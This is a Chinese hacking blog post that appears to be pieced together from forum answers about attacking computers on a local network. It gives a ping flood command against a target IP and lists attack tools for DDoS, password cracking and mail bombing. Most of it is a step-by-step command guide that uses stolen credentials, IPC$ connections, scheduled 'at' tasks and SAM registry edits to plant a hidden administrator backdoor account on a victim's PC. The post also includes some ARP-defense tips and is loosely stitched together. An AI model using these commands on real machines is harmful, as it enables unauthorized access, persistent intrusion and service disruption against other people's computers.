作者:hacker发布时间:2022-09-13分类:破解邮箱浏览:83评论:1
网攻击型软件 可以把局域网其中的一台计算机攻击下线或死机聚生、网络剪刀手等P2P管理软件都行,只要输入对方IP地址在选择发送包的大小然后按下就对方就挂的,轻则断线,重则蓝屏或死机,不括只适用内网的,不过以前用ping 也试过,ping 的话越多台就越容易让目标机死,具体命令就是 ping -l 65500 -t 192.168.1.21
后面就是目标IP的,好的既然有怎么多人反对我也不想去找那软件给你的,分数吗我也随便的,有就拿没有就算的
你可借助360ARP拦截提示,追查出攻击你的真实IP地址.
然后将你的TCP/IP改为追查出攻击你的IP地址,此方法是利用IP冲突导致他也无法上网.
攻击者一般都是利用类似终结着的软件.而这类软件大多都是以网关欺骗的方式来拦截或转移你的数据包,从而导致你无法上线.
接着改你的DNS,不要继续使用你网内的DNS,将它改为外界一个可用的即可.比如改为公司电脑的DNS,或一个大型网吧的等...DNS还有特殊的功能,它可以提高IE浏缆速度.提高浏缆网页效果,加速硬件等..
流光——专用于win2000,轻松获得权限
DDOS——使服务器崩溃的最佳武器(就好多几台电脑一起)
X-CAN——扫描漏洞一点通
网络刺客——密码破解方便实用
KaBoom——对方服务器有邮箱?杀杀杀!
从你的问题可以说明,有两种情况,一种是你下面的人用聚生网管等这种软件,另外一种情况可能下面的人中了ARP病毒,这样才会不断向网关里的电脑发送ARP, 如何防止呢,一种方法就是大家用的ARP防火墙,另外一种方法就是: 1、ARP攻击 针对ARP的攻击主要有两种,一种是DOS,一种是Spoof。 ARP欺骗往往应用于一个内部网络,我们可以用它来扩大一个已经存在的网络安全漏洞。 如果你可以入侵一个子网内的机器,其它的机器安全也将受到ARP欺骗的威胁。同样,利用APR的DOS甚至能使整个子网瘫痪。 2、对ARP攻击的防护 防止ARP攻击是比较困难的,修改协议也是不大可能。但是有一些工作是可以提高本地网络的安全性。 首先,你要知道,如果一个错误的记录被插入ARP或者IP route表,可以用两种方式来删除。 a. 使用arp –d host_entry b. 自动过期,由系统删除 这样,可以采用以下的一些方法: 1). 减少过期时间 #ndd –set /dev/arp arp_cleanup_interval 60000 #ndd -set /dev/ip ip_ire_flush_interval 60000 60000=60000毫秒 默认是300000 加快过期时间,并不能避免攻击,但是使得攻击更加困难,带来的影响是在网络中会大量的出现ARP请求和回复,请不要在繁忙的网络上使用。 2). 建立静态ARP表 这是一种很有效的方法,而且对系统影响不大。缺点是破坏了动态ARP协议。可以建立如下的文件。 test.nsfocus.com 08:00:20:ba:a1:f2 user. nsfocus.com 08:00:20:ee:de:1f 使用arp –f filename加载进去,这样的ARP映射将不会过期和被新的ARP数据刷新,除非使用arp –d才能删除。但是一旦合法主机的网卡硬件地址改变,就必须手工刷新这个arp文件。这个方法,不适合于经常变动的网络环境。 3).禁止ARP 可以通过ifconfig interface –arp 完全禁止ARP,这样,网卡不会发送ARP和接受ARP包。但是使用前提是使用静态的ARP表,如果不在apr表中的计算机 ,将不能通信。这个方法不适用与大多数网络环境,因为这增加了网络管理的成本。但是对小规模的安全网络来说,还是有效和可行的
如果你不是很懂命令行的指令,建议你去下个p2p终结者,该软件容易上手。能很好的控制局域网内的资源流量,以及你所说的“攻击”。直接把他的网断了,就是最好的攻击,呵呵。有点过激了.....开开玩笑是可以的,千万别当真耽误工作。如果你能使用你们局域网的主机,在主机上使用效果很好。
换种方法,假如你知道你们局域网路由的访问口令,那个更直接,更效率。
请问者三思,任何后果概不负责。
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~
标签:局域网服务器攻击软件
已有1位网友发表了看法:
访客 评论于 2022-09-13 13:18:54 回复
168.1.21 后面就是目标IP的,好的既然有怎么多人反对我也不想去找那软件给你的,分数吗我也随便的,有就拿没有就算的局域网内有人用攻击软件怎么办?你可借助360ARP拦截提示,追查出攻击你的真实IP地址.然后将你的TCP/IP改为追查出攻击你的IP地址,此方法是利用IP冲突导致他也无法上网.